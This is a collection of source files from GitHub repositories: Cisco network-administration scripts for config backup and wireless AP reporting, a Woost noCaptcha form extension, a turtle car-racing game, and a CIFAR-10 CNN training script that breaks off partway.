ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n hostlist = output.splitlines()\n hostname1 = hostlist[1]\n hostname = hostname1[:-1]\n\n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt quiet\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n\n today = time.strftime(\"%x\")\n timenow = time.strftime(\"%X\")\n filename = (hostname + '-' + '%s' + '@' + '%s') % (today, timenow)\n filename = filename.replace(\"/\", \"-\")\n filename = filename.replace(\":\", \"-\")\n \n ssh_channel.send(\"dir flash:/\" + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(2000)\n 
output = outp.decode(\"utf-8\")\n \n if 'vlan.dat' in output:\n ssh_channel.send(\"copy flash:/vlan.dat tftp://192.168.1.106/\" + filename + \".dat\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"copy run tftp://192.168.1.106/\" + filename + \".cfg\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"config t\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"file prompt noisy\" + \"\\n\")\n time.sleep(0.3)\n\n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n \n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n print(hostname)\n print(\" Exiting...\" + \"\\n\")\n" }, { "alpha_fraction": 0.5331753492355347, "alphanum_fraction": 0.5485782027244568, "avg_line_length": 29.14285659790039, "blob_id": "48da5213784b0cdacfc5e3cf8dd3ad1040825205", "content_id": "7f33b572e28c994a96890edc0a9b66653f7d5cee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/migrate_APs/set_ap_to_flexconnect.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "Text = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\show_ap_summary.txt\"\nnewfile = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\set_ap_to_flexconnect.txt\"\n\nignore = ('(Cisco Controller)',\n 'Number of APs',\n 'Global AP username',\n 'Global AP User Name',\n 'Global AP Dot1x username',\n 'Global AP Dot1x User Name',\n 'AP Name',\n '----------')\n\napnamelist = []\nwith open(Text, 'r') as fh:\n for line in fh:\n if line.startswith(ignore) or len(line) <= 1:\n continue\n templist = line.split()\n apnamelist.append(templist[0])\n\nwith open(newfile, \"a\") as file2:\n counter = 0\n for name in apnamelist:\n file2.write(\"config ap mode flexconnect {0}\\n\".format(name))\n counter += 1\n if counter == 20:\n file2.write(\"\\n\")\n counter = 0\n" }, { "alpha_fraction": 0.5610988736152649, "alphanum_fraction": 0.5942857265472412, "avg_line_length": 28.9342098236084, "blob_id": "5d1f35a7bb63bd89a6b3aaffe22302642767bb36", "content_id": "f928eec1e34be3cb5ae05273ec13b3fae8f0f2d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4550, "license_type": "no_license", "max_line_length": 152, "num_lines": 152, "path": "/Clients_per_AP/clients_per_ap_v4.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.42\n# show client summary processing\n# @author mcs\n# 4/25/2018\n\n# https://stackoverflow.com/questions/41879712/python-list-of-lists-to-dataframe-assertionerror\n\n# https://stackoverflow.com/questions/42869544/dictionary-of-lists-to-dataframe\n\n# https://stackoverflow.com/questions/25292568/converting-a-dictionary-with-lists-for-values-into-a-dataframe\n\n# https://stackoverflow.com/questions/50008491/trying-to-create-a-seaborn-heatmap-from-a-pandas-dataframe/50008537?noredirect=1#comment87033687_50008537\n\nimport paramiko\nimport time\nimport re\nimport csv\nfrom collections import defaultdict\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to 
device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef ap_data(ssh_channel):\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n time.sleep(1.0)\n discard = ssh_channel.recv(10000)\n ssh_channel.send(\"show ap summary\" + \"\\n\")\n time.sleep(1.0)\n outp = ssh_channel.recv(100000)\n shapsumstring = outp.decode(\"utf-8\")\n shapsumlist = shapsumstring.splitlines()\n shapsumlist = shapsumlist[9:-2]\n regex1 = re.compile(r'(.+?)(?: 2)')\n regex2 = re.compile(r'(?:(?:(?:[0-9a-f]{2}[:-]){5})(?:[0-9a-f]{2}))(?:\\s)(.+?)(?:\\s)')\n\n d = defaultdict(int)\n e = {}\n cols = []\n index = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']\n c = 0\n x = 0\n\n for line in shapsumlist:\n mo = regex1.search(line)\n ap_name = mo.group(1).rstrip()\n e[ap_name] = []\n cols.append(ap_name)\n\n while x < 9:\n\n ssh_channel.send(\"show client summary\" + \"\\n\")\n\n time.sleep(1.0)\n outp = ssh_channel.recv(150000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n\n del shclisumlist[:12]\n del shclisumlist[-3:]\n\n for line in shclisumlist:\n mo = regex2.search(line)\n ap_name = mo.group(1)\n d[ap_name] += 1\n\n for k, v in d.items():\n e[k].append(v)\n\n d.clear()\n shclisumstring = ''\n shclisumlist.clear()\n\n for key in e:\n if len(e[key]) == c:\n e[key].append(0)\n c += 1\n\n if x == 8:\n\n df = pd.DataFrame(e, index=index, columns=cols)\n df = df.transpose()\n\n my_dpi = 96\n sns.set(font_scale=2)\n # plt.figure(figsize=(13, 91))\n plt.figure(figsize=(2016 / my_dpi, 9120 / my_dpi), dpi=my_dpi)\n\n sns.heatmap(df, cmap='RdYlGn_r', linewidths=0.5, annot=True, annot_kws={\"size\": 20})\n\n plt.savefig('d:\\\\python\\\\projects\\\\clients_per_ap\\\\ac.png')\n plt.show()\n\n # time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n time.sleep(15.0 - time.time() % 15.0)\n\n x += 1\n\n\ndef main():\n # Get all devices from csv_file\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n for a_connection in ssh_conns:\n ap_data(a_connection)\n\n\nif __name__ == \"__main__\":\n main()\n" } ]
18
marticongost/woost.extensions.nocaptcha
https://github.com/marticongost/woost.extensions.nocaptcha
63c02117ba665664ff833103eb0cb2228d018b39
278a0235f2295e232ea0d96407c0c7e30470a38e
190ed9eeca3cabd984c5af5b3adef43c9479ce58
refs/heads/master
2020-08-16T17:18:47.935980
2019-06-03T08:38:13
2019-06-03T08:38:13
215530432
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7149122953414917, "alphanum_fraction": 0.719298243522644, "avg_line_length": 24.22222137451172, "blob_id": "20b2b5d96dfbc6f4d45df61ab95b9122bb19fc64", "content_id": "c727cba5ded9c121bc05f45c3bb350282daeb28c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 228, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/woost/extensions/nocaptcha/__init__.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom woost import app\nfrom . import settings, admin\nfrom .member import NoCaptcha, NoCaptchaValidationError\nfrom .form import add_nocaptcha, requires_nocaptcha\n\n" }, { "alpha_fraction": 0.6573875546455383, "alphanum_fraction": 0.659528911113739, "avg_line_length": 18.41666603088379, "blob_id": "babbbb9ea08935603fb5e7dde8cf6f2b0f549c44", "content_id": "6bb76d94e6f350614dcb4dbcaddcc22a0f4aff42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/woost/extensions/nocaptcha/settings.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom cocktail import schema\nfrom cocktail.translations import translations\nfrom woost.models import add_setting, Configuration\n\ntranslations.load_bundle(\"woost.extensions.nocaptcha.settings\")\n\nadd_setting(\n schema.String(\n \"x_nocaptcha_public_key\",\n text_search = False\n )\n)\n\nadd_setting(\n schema.String(\n \"x_nocaptcha_private_key\",\n text_search = False\n )\n)\n\n" }, { "alpha_fraction": 0.5590406060218811, "alphanum_fraction": 0.5701106786727905, "avg_line_length": 27.5, "blob_id": "84f99888096ac25d688bceefcb35d10e3e86d582", "content_id": "d195b6106be32488239f2aa730bf240173476af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1084, "license_type": "no_license", "max_line_length": 74, "num_lines": 38, "path": "/setup.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. 
moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom setuptools import setup\n\nsetup(\n name = \"woost.extensions.nocaptcha\",\n version = \"0.0b1\",\n author = \"Whads/Accent SL\",\n author_email = \"[email protected]\",\n maintainer = \"Marti Congost\",\n maintainer_email = \"[email protected]\",\n url = \"http://woost.info\",\n description =\n \"\"\"\n Woost extension to integrate NoCaptcha controls.\n \"\"\",\n classifiers = [\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Web Environment\",\n \"Framework :: ZODB\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Natural Language :: Catalan\",\n \"Natural Language :: Spanish\",\n \"Programming Language :: Python :: 2\",\n \"Topic :: Internet :: WWW/HTTP :: Site Management\"\n ],\n install_requires = [\n \"woost>=3.0b1,<3.1\"\n ],\n packages = [\"woost.extensions.nocaptcha\"],\n include_package_data = True,\n zip_safe = False\n)\n\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.6829836964607239, "avg_line_length": 25.78125, "blob_id": "5bd25a5b68c718521959e32c910739e4016fa546", "content_id": "5f81f9700059760b82879c791165aa69a7363836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 69, "num_lines": 32, "path": "/woost/extensions/nocaptcha/form.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom cocktail.events import when\nfrom .member import NoCaptcha\n\ndef add_nocaptcha(form, **member_kwargs):\n\n member_kwargs.setdefault(\"name\", \"nocaptcha\")\n member_kwargs.setdefault(\"member_group\", \"nocaptcha\")\n member = NoCaptcha(**member_kwargs)\n form.schema.add_member(member, append = True)\n\n if member.member_group and form.schema.groups_order:\n\n if not isinstance(form.schema.groups_order, list):\n form.schema.groups_order = list(form.schema.groups_order)\n\n form.schema.groups_order.append(member.member_group)\n\n form.adapter.exclude(member.name)\n return member\n\ndef requires_nocaptcha(form_class, **member_kwargs):\n\n @when(form_class.declared)\n def handler(e):\n add_nocaptcha(e.source, **member_kwargs)\n\n return form_class\n\n" }, { "alpha_fraction": 0.725239634513855, "alphanum_fraction": 0.7268370389938354, "avg_line_length": 23.038461685180664, "blob_id": "9ee082e3e8feaa0615792276f2561cf0e93eed37", "content_id": "f1fb5977b54952d925893ab0fbe657db6107a991", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 626, "license_type": "no_license", "max_line_length": 75, "num_lines": 26, "path": "/woost/extensions/nocaptcha/admin/sections.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. 
moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nfrom cocktail.events import when\nfrom cocktail.translations import translations\nfrom woost.admin.sections import Settings\nfrom woost.admin.sections.contentsection import ContentSection\n\ntranslations.load_bundle(\"woost.extensions.nocaptcha.admin.sections\")\n\n\nclass NoCaptchaSection(Settings):\n\n icon_uri = \"woost.extensions.nocaptcha.admin.ui://images/nocaptcha.svg\"\n\n members = [\n \"x_nocaptcha_public_key\",\n \"x_nocaptcha_private_key\",\n ]\n\n\n@when(ContentSection.declared)\ndef fill(e):\n e.source.append(NoCaptchaSection(\"nocaptcha\"))\n\n" }, { "alpha_fraction": 0.621666669845581, "alphanum_fraction": 0.6225000023841858, "avg_line_length": 29.367088317871094, "blob_id": "9f90873c1f130e40de2424bc2e4465830f0e9173", "content_id": "0b403ded309fdf26feea380af0ddd30ec7f00089", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2400, "license_type": "no_license", "max_line_length": 73, "num_lines": 79, "path": "/woost/extensions/nocaptcha/member.py", "repo_name": "marticongost/woost.extensions.nocaptcha", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\"\"\"\n\n.. moduleauthor:: Martí Congost <[email protected]>\n\"\"\"\nimport cherrypy\nfrom json import loads\nimport urllib.request, urllib.parse, urllib.error\nimport urllib.request, urllib.error, urllib.parse\nfrom cocktail.translations import translations\nfrom cocktail import schema\nfrom cocktail.html.uigeneration import default_edit_control\nfrom cocktail.schema.exceptions import ValidationError\nfrom woost.models import get_setting\n\ntranslations.load_bundle(\"woost.extensions.nocaptcha.member\")\n\n\nclass NoCaptcha(schema.String):\n \"\"\"A member that handles noCaptcha values.\"\"\"\n\n VERIFY_SERVER = \"https://www.google.com/recaptcha/api/siteverify\"\n\n def __init__(self, name = None, *args, **kwargs):\n\n kwargs.setdefault(\"parameter_name\", \"g-recaptcha-response\")\n\n if not name:\n name = \"nocaptcha\"\n\n schema.String.__init__(self, name, *args, **kwargs)\n\n def _default_validation(self, context):\n \"\"\"Validation rule for noCaptcha. Checks that the L{response}\n member is valid for the L{public_key} and L{private_key}\n constraints.\n \"\"\"\n for error in schema.Member._default_validation(self, context):\n yield error\n\n value = context.value\n if value:\n params = urllib.parse.urlencode({\n \"secret\" : get_setting(\"x_nocaptcha_private_key\"),\n \"response\" : value,\n \"remoteip\" : cherrypy.request.remote.ip\n }).encode(\"utf-8\")\n\n request = urllib.request.Request(\n url = self.VERIFY_SERVER,\n data = params,\n headers = {\n \"Content-type\" : \"application/x-www-form-urlencoded\",\n \"User-agent\" : \"Woost noCAPTCHA extension\"\n }\n )\n\n httpresp = urllib.request.urlopen(request)\n return_values = httpresp.read()\n httpresp.close()\n response_json = loads(return_values)\n\n if not response_json['success']:\n yield NoCaptchaValidationError(context)\n\n else:\n yield NoCaptchaValidationError(context)\n\n\nclass NoCaptchaValidationError(ValidationError):\n \"\"\"A validation error produced when the user fails a NoCaptcha\n validation.\n \"\"\"\n\n\ndefault_edit_control.set_member_type_display(\n NoCaptcha,\n \"woost.extensions.nocaptcha.NoCaptchaBox\"\n)\n\n" } ]
6
roshan1208/Car-Racing-Game-python-
https://github.com/roshan1208/Car-Racing-Game-python-
fe6d6e768f82a62d7120057ec839ad1f9597bd99
095b6f11cd6fe0e50d8b94b53dab024a93981095
650091969d78c7b60aa3a639e9ad5eafdf623e04
refs/heads/main
2023-03-11T07:58:22.877236
2021-02-19T07:53:11
2021-02-19T07:53:11
340293776
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4665161669254303, "alphanum_fraction": 0.5094055533409119, "avg_line_length": 24.918367385864258, "blob_id": "92c87e6e29dfef6e2bac555d7e45420bc70ab987", "content_id": "d73162f9685192ae3465ff5bac1bd44e6767a322", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 43, "num_lines": 49, "path": "/Car Racing Game/cars.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "import turtle as t\r\nfrom turtle import Turtle\r\nimport random\r\nt.colormode(255)\r\n\r\nclass Cars(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.car_speed = 10\r\n self.carcollection = []\r\n self.create_cars()\r\n\r\n def create_cars(self):\r\n tur = Turtle('square')\r\n tur.color('white')\r\n x_loc = -260\r\n # x_loc = random.randint(-280, 280)\r\n y_loc = random.randint(0, 9)\r\n tur.penup()\r\n tur.goto(x_loc, -225 + y_loc*50)\r\n self.carcollection.append(tur)\r\n # tur.forward(20)\r\n\r\n def move(self):\r\n for tur in self.carcollection:\r\n tur.forward(self.car_speed)\r\n\r\n def random_cars(self):\r\n tur = Turtle('square')\r\n r = random.randint(20,255)\r\n g = random.randint(20, 255)\r\n b = random.randint(20, 255)\r\n tur.color((r, g, b))\r\n x_loc = -310\r\n # x_loc = random.randint(-280, 280)\r\n y_loc = random.randint(0, 9)\r\n tur.penup()\r\n tur.goto(x_loc, -225 + y_loc*50)\r\n self.carcollection.append(tur)\r\n #tur.forward(20)\r\n\r\n def reset(self):\r\n for car in self.carcollection:\r\n car.reset()\r\n car.hideturtle()\r\n self.carcollection = []\r\n\r\n def level_up(self):\r\n self.car_speed += 2\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.45465537905693054, "alphanum_fraction": 0.4897218942642212, "avg_line_length": 28.55555534362793, "blob_id": "07095087bd0a8836821d54d1f52a0fa8b8f8a33c", "content_id": "82d915bd66f4df75ee1930d47191916fa1af13db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1654, "license_type": "no_license", "max_line_length": 64, "num_lines": 54, "path": "/Car Racing Game/mycar.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle\r\n\r\n\r\nclass MyCar(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.my_turtle = 0\r\n self.score = 0\r\n self.create_mycar()\r\n\r\n def create_mycar(self):\r\n tur = Turtle('turtle')\r\n tur.shapesize()\r\n tur.color('red')\r\n tur.penup()\r\n tur.goto(0, -270)\r\n tur.setheading(90)\r\n self.my_turtle = tur\r\n\r\n def moveup(self):\r\n if self.my_turtle.ycor() > 0:\r\n if self.my_turtle.ycor() < 280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.forward(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), 270)\r\n else:\r\n if self.my_turtle.ycor() > -280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.forward(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), -270)\r\n\r\n def movedown(self):\r\n if self.my_turtle.ycor() > 0:\r\n if self.my_turtle.ycor() < 280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.back(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), 270)\r\n else:\r\n if self.my_turtle.ycor() > -280:\r\n self.my_turtle.setheading(90)\r\n self.my_turtle.back(20)\r\n else:\r\n self.my_turtle.goto(self.my_turtle.xcor(), -270)\r\n\r\n def moveleft(self):\r\n self.my_turtle.setheading(180)\r\n self.my_turtle.forward(20)\r\n\r\n def moveright(self):\r\n 
self.my_turtle.setheading(0)\r\n self.my_turtle.forward(20)\r\n\r\n\r\n" }, { "alpha_fraction": 0.4104575216770172, "alphanum_fraction": 0.46078431606292725, "avg_line_length": 25.85454559326172, "blob_id": "898377b4eeb6f34e0e58ecc0e70b8c3d41efcf81", "content_id": "b0c602ac85da2ed9b22d93c705e6c932bba992ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 91, "num_lines": 55, "path": "/Car Racing Game/graphics.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle\r\n\r\nROAD = 40\r\n\r\n\r\nclass Graphics(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.create_road()\r\n self.create_road_path()\r\n self.write()\r\n\r\n def create_road(self):\r\n for i in range(11):\r\n tur = Turtle('square')\r\n tur.color('blue')\r\n tur.pensize(4)\r\n tur.penup()\r\n tur.speed('fastest')\r\n tur.goto(-300, -(300-50*(i+1)))\r\n tur.pendown()\r\n tur.speed('fastest')\r\n tur.forward(600)\r\n tur.hideturtle()\r\n\r\n def create_road_path(self):\r\n tur2 = Turtle('square')\r\n tur2.color('white')\r\n tur2.pensize(2)\r\n tur2.penup()\r\n tur2.speed('fastest')\r\n for i in range(10):\r\n tur2.goto(-300, -(275-50*(i+1)))\r\n for j in range(15):\r\n tur2.pendown()\r\n tur2.speed(0)\r\n tur2.forward(20)\r\n tur2.penup()\r\n tur2.speed(0)\r\n tur2.forward(20)\r\n tur2.hideturtle()\r\n\r\n def write(self):\r\n tur3 = Turtle()\r\n tur3.penup()\r\n tur3.speed(10)\r\n tur3.goto(-10, -285)\r\n tur3.color('green')\r\n tur3.write(f'Starting Point', align='center', font=(\"Comic Sans MS\", 20, \"normal\"))\r\n\r\n tur3.penup()\r\n tur3.goto(-20, 260)\r\n tur3.color('red')\r\n tur3.write(f'End Point', align='center', font=(\"Comic Sans MS\", 20, \"normal\"))\r\n tur3.hideturtle()" }, { "alpha_fraction": 0.5918367505073547, "alphanum_fraction": 0.6161695718765259, "avg_line_length": 21.629629135131836, "blob_id": "f2fbcd66f3855775a22f5980f834aa36ce000f23", "content_id": "a6f86f533322da79e2fa6fbeb8ab0e4fe242b0f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 67, "num_lines": 54, "path": "/Car Racing Game/main.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle, Screen\r\nfrom graphics import Graphics\r\nfrom cars import Cars\r\nfrom mycar import MyCar\r\nfrom score import Score\r\nimport time\r\n\r\n\r\nscreen = Screen()\r\nscreen.setup(width=600, height=600)\r\nscreen.title('Car Race Game')\r\nscreen.bgcolor('black')\r\nscreen.tracer(0)\r\n\r\ncars = Cars()\r\ngraphics = Graphics()\r\nmycar = MyCar()\r\nscore = Score()\r\n\r\nscreen.listen()\r\nscreen.onkeypress(key='Up', fun=mycar.moveup)\r\nscreen.onkeypress(key='Down', fun=mycar.movedown)\r\nscreen.onkeypress(key='Left', fun=mycar.moveleft)\r\nscreen.onkeypress(key='Right', fun=mycar.moveright)\r\n\r\nis_true = True\r\ni = 1\r\nwhile is_true:\r\n screen.update()\r\n time.sleep(0.03)\r\n if i%3 == 0:\r\n cars.random_cars()\r\n\r\n for car in cars.carcollection:\r\n if car.distance(mycar.my_turtle) <= 20:\r\n mycar.my_turtle.forward(20)\r\n is_true = False\r\n score.game_over()\r\n\r\n cars.move()\r\n i += 1\r\n if mycar.my_turtle.distance(mycar.my_turtle.xcor(), 280) <= 10:\r\n mycar.my_turtle.forward(20)\r\n i = 1\r\n score.level_up()\r\n time.sleep(2)\r\n score.score_turtle.clear()\r\n 
mycar.my_turtle.goto(0, -280)\r\n cars.reset()\r\n cars.level_up()\r\n score.scoreboard()\r\n\r\n\r\nscreen.exitonclick()" }, { "alpha_fraction": 0.49504950642585754, "alphanum_fraction": 0.5115511417388916, "avg_line_length": 26.40625, "blob_id": "c7d0d954bc08779fe3b8f6f361026f1d3cf93fe9", "content_id": "516d9823b32ab4ba59620607ad90638c4763a947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 909, "license_type": "no_license", "max_line_length": 95, "num_lines": 32, "path": "/Car Racing Game/score.py", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "from turtle import Turtle\r\n\r\nclass Score(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.temp = 0\r\n self.score_turtle = 0\r\n\r\n\r\n def level_up(self):\r\n self.temp += 1\r\n tur = Turtle()\r\n tur.color('yellow')\r\n tur.hideturtle()\r\n tur.penup()\r\n tur.write(f'Level {self.temp} ', align='center', font=(\"Comic Sans MS\", 30, \"normal\"))\r\n self.score_turtle = tur\r\n\r\n def game_over(self):\r\n tur = Turtle()\r\n tur.color('red')\r\n tur.hideturtle()\r\n tur.penup()\r\n tur.write(f'Game Over ', align='center', font=(\"Comic Sans MS\", 40, \"normal\"))\r\n\r\n def scoreboard(self):\r\n self.clear()\r\n self.color('white')\r\n self.hideturtle()\r\n self.penup()\r\n self.goto(-200, 260)\r\n self.write(f'Score {self.temp} ', align='center', font=(\"Comic Sans MS\", 20, \"normal\"))\r\n" }, { "alpha_fraction": 0.7593085169792175, "alphanum_fraction": 0.7646276354789734, "avg_line_length": 38.578948974609375, "blob_id": "ef9877fd1e6aee7058e379313caf6f760a197f58", "content_id": "86a2a0e8f08211cce359b5998c3896cc04b57052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 752, "license_type": "no_license", "max_line_length": 115, "num_lines": 19, "path": "/README.md", "repo_name": "roshan1208/Car-Racing-Game-python-", "src_encoding": "UTF-8", "text": "# Car-Racing-Game-python-\n#FunProject\n#ChildhoodGame\n#CodeInPython\n\nIn this project i have create 2-D Car Racing Game which personally i used to play in my childhood days\nidea is simple a Turtle want to cross the multi lan Road and now its your responsibility to help turtle by pressing\nUp, Down, Left, Right arrow key to cross the road....(From Starting point to End point)\nevery time Turtle reach the end point... Game will level up and car speed will increase ...\n..\n\nstep to follow:\n1.> Open \"Car Racing Game\" Folder to pycharm, vscode or spyder IDE (i personally use Pycharm)\n2.First verify in your interpreter \"turtle library\" is install or not? (If not then install turtle library)\n3.> Run main.py file \n\nEnjoy\nFor any query contact me:\[email protected]\n" } ]
6
hatefap/cnn
https://github.com/hatefap/cnn
ebc0a61b4a75ecabdf5f3b66cac2f1e4f5893efd
1dc3a952aa183a28a034d0056f229871934579fb
dfdb64ee4a2a5d453b09a00a0827568d9c2bfac5
refs/heads/master
2020-06-18T20:10:38.759516
2019-07-13T11:07:30
2019-07-13T11:07:30
196431577
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6230273246765137, "alphanum_fraction": 0.6592562198638916, "avg_line_length": 28.60569190979004, "blob_id": "e99cdb451323d190f14df8322584c86da4c85d2f", "content_id": "19c5b931e3e1a31c31807bd52e39c6fb9182bba1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7287, "license_type": "no_license", "max_line_length": 132, "num_lines": 246, "path": "/cnn.py", "repo_name": "hatefap/cnn", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport tensorflow as tf\n\n\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport math\n\n\n\n\nimport glob\n\n\n\n\n#directory location of cifar-10 binary files\nCIFAR_LOCATTION = '/home/hatef/cifar-10/cifar-10-batches-bin/'\nBATCH_SIZE = 32\nLEARNING_RATE = 0.001\nEPOCH = 50\n\n\n\n\n# produce images for training from data_batch_i where 0 < i < 6\ndef image_training_generator():\n # if you look at cifar-10 extracted zip file, you see following pattern among training files \n common_name = 'data_batch_?.bin'\n bin_files = []\n for file in glob.glob(CIFAR_LOCATTION + common_name):\n bin_files.append(file)\n \n while(len(bin_files) > 0):\n file_path = bin_files.pop()\n with open(file_path, 'rb') as handle:\n while True:\n label = handle.read(1) # first byte is label of image, label is between 0-9\n image = handle.read(3072) # next 3072 bytes are image itself\n # if we reach eof file\n if len(label) < 1 or len(image) < 3072: \n break\n label = int.from_bytes(label, byteorder=sys.byteorder)\n one_hot_encoded_label = np.zeros(shape=(10,))\n one_hot_encoded_label[label] = 1\n \n image = np.array([b for b in image])\n R = image[0:1024].reshape(32,32)\n G = image[1024:2048].reshape(32,32)\n B = image[2048:].reshape(32,32)\n yield np.dstack((R, G, B)) / 255, one_hot_encoded_label\n \n\n\n\n\n# you can use similar approach to generate test data, but here we want to use another common approach\ntest_pickle_python = '/home/hatef/cifar-10/python/cifar-10-batches-py/test_batch'\ndef unpickle(file_location):\n import _pickle as cPickle\n with open(file_location, 'rb') as fo:\n dict = cPickle.load(fo, encoding='latin1')\n return dict\n\ntest_data = unpickle(test_pickle_python)\n\n\n\n\nx_test = test_data['data']\ny_test = test_data['labels']\n\nx_test = x_test.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype(\"uint8\")\nx_test = x_test / 255\n\nn_classes = 10\ny_test = np.array(y_test).reshape(-1)\ny_test = 